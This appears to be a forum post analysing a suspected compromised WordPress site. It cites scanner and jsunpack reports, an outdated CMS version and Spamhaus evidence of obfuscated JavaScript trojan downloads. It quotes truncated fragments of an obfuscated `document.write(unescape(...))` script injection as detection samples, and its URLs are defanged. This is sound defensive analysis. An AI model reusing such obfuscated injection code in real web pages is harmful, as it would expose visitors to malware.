avast!Shields let me go there…
See: http://app.webinspector.com/public/reports/19053315
32 potentially suspicious files - Spam code xss injection, view: http://jsunpack.jeek.org/?report=beb0790d413097d6b48bbee202bc3b2affbd4d65
Read author Sebastian Foss: http://www.spamhaus.org/rokso/evidence/ROK8582/sebastian-foss/attached-html-files-javascript-obfuscation-trojan-download
Javascript check Malware Code detector flags: Suspicious
Script language=“javascript”> document.write(unescape("%3c%53%43%52%49%50%54%20%4c%41%4e%47%55%41%47%45%3d%22%4a
404 error check: Suspicious
Suspicious 404 Page:
document.write(unescape("%3c%53%43%52%49%50%54%20%4c%41%4e%47%55%41%47%45%3d%22%4
Compromised via CMS: Web application version:
WordPress version: WordPress
Wordpress Version 3.5 based on: htxp://www.eunumbebo.com//wp-admin/js/common.js
WordPress directory: htxp://www.eunumbebo.com/wp-content
WordPress theme: htxp://www.eunumbebo.com/wp-content/themes/newssetter-child/
WordPress version outdated: Upgrade required.
Code hick-up: wXw.eunumbebo.com/wp-content/themes/newssetter-parent/cache/min-js-c0fef42109e6f45700eda6ed92dcabce.js?ver=0.0 benign
[nothing detected] (script) wXw.eunumbebo.com/wp-content/themes/newssetter-parent/cache/min-js-c0fef42109e6f45700eda6ed92dcabce.js?ver=0.0
status: (referer=eunumbebo dot com/)saved 2004 bytes 429c1b4bb4c94867520b171ccca57dfad3a660b9
info: [decodingLevel=0] found JavaScript
error: undefined variable jQuery
error: undefined function jQuery
suspicious:
Secure scripting protected me from going here: htxps://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDwQFjAB&url=http%3A%2F%2Fspam.tamagothi.de%2Fwp-content%2Fuploads%2F2008%2F06%2Fniemals-als-html-datei-verwenden.txt&ei=WYK4UpyMMYjZsgarv4BI&usg=AFQjCNHHrBdZywemYXynUc6TkMqGW7sTXg&bvm=bv.58187178,d.Yms
No flags here: http://urlquery.net/report.php?id=8519926 & http://zulu.zscaler.com/submission/show/672fcb123c8def9fad26ce3d255c60bc-1387823830
polonus